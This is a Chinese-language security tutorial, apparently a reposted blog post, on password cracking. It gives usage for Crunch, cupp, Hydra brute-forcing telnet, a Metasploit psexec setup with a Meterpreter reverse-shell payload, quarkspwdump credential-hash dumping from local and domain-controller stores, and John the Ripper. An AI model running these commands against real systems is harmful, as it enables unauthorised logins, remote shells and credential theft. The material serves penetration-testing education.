其他分享
首页 > 其他分享> > 口令破解(概述、暴力破解、字典破解、Hydra)

口令破解(概述、暴力破解、字典破解、Hydra)

作者:互联网

文章目录

口令破解


概述

现在很多地方都以用户名(账号)和口令(密码)作为鉴权的方式,口令(
密码)就意味着访问权限。口令(密码)就相当于进入家门的钥匙,当他
人有一把可以进入你家的钥匙,想想你的安全、你的财务、你的隐私…
例如网站后台、数据库、服务器、个人电脑、QQ、邮箱等。

口令安全现状

  1. 弱口令
    类似于123456、654321k admin123 等这样常见的弱密码。
  2. 默认口令
    很多应用或者系统都存在默认口令;如phpstudy的mysql数据库默认账密[root/root],Tomcat管理控制台默认账密[tomcat/ tomcat]等。
  3. 明文传输
    如HTTP、FTP、TELNET等服务,在网络中传输的数据流都是明文的,包括口令认证信息等。这样的服务,有被嗅探的风险。

破解方式

暴力破解

暴力破解就是利用所有可能得字符组密码,去尝试破解。这是最原始,粗暴的破解方法,根据运算能力,如果能够承受的起时间成本的话,最终一定会爆破出密码。

字符集           密码位数             密码空间
[0-9]             8位            10^8=100000000
[0-9][a-z]        8位          36^8=2821109907456
[0-9][a-z]       1-8位                 ??

kali的字典生成工具:Crunch

是一种创建密码字典工具,按照指定的规则生成密码字典,可以灵活的制定自己的字典文件。使用Crunch工具生成的密码可以输出到屏幕,保存到文件、或另一个程序。

在这里插入图片描述

它有一个库文件:cat /usr/share/crunch/charset.lst

在这里插入图片描述

字典破解

字典破解就是通过比较合理的条件,筛选或者过滤掉一些全字符组合的
内容,大幅降低爆破的成本。我们把筛选出的密码组合成特定的字典。在用字典爆破密码也是可以的,但是这样做有可能会漏掉真正的密码。
密码字典大致分为以下几类:

cupp工具

国外开发的,更偏向国外人的习惯。

在这里插入图片描述
在这里插入图片描述

生成一个以你输入的first name开头的txt字典:

在这里插入图片描述

其他字典生成器:

在这里插入图片描述

Hydra

  1. “九头蛇”,是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。
  2. windows版本下载:https://github.com/maaaaz/thc-hydra-windows
  3. 可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。
  4. 简单命令
# 指定用户进行密码破解
hydra.exe -L 用户名字典 -P 密码字典路径 目标地址 密码类型

-l LOGIN  指定破解的用户,对特定用户破解
-L FILE   指定用户名字典
-vV       显示爆破详细过程
-0        保存爆破结果
-f        找到正确的密码就停止爆破
-e nsr    null密码、same、反向
-t num    线程数为num

密码类型(telnet、ftp、ssh、smb...)
# 破解10.1.1.2主机上的远程登录密码,使用e盘下的user.txt用户名字典和e盘下的password.txt密码字典进行暴力破解
hydra.exe -L e:\user.txt -P e:\password.txt 10.1.1.2 telnet
  1. MSF----SMB,已知SMB帐密,远程连接windows系统并执行命令。
use exploit/windows/smb/psexec_psh
set payload windows/meterpreter/reverse tcp
set RHOSTS 目标IP地址
set SMBUSER 用户名
set SMBPASS 密码
set LHOST 监听IP地址

quarkspwdump

  1. 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和 Bitlocker。
  2. 参数
-dhl   导出本地哈希值
-dhdc  导出内存中的域控哈希值
-dhd   导出域控哈希值,必须指定NTDS文件
-db    导出Bitlocker信息,必须指定NTDS文件
-nt    导出ntds文件
-hist  导出历史信息,可选项
-t     导出类型可选默认导出为John类型。
-o     导出文件到本地
  1. 在使用john进行破解
john hash文件 -- format=NT --wordlist=密码字典路径
john --show hash文件 --format=NT

标签:暴力破解,密码,导出,口令,Hydra,HTTP,破解,字典
来源: https://blog.csdn.net/weixin_45677119/article/details/110941766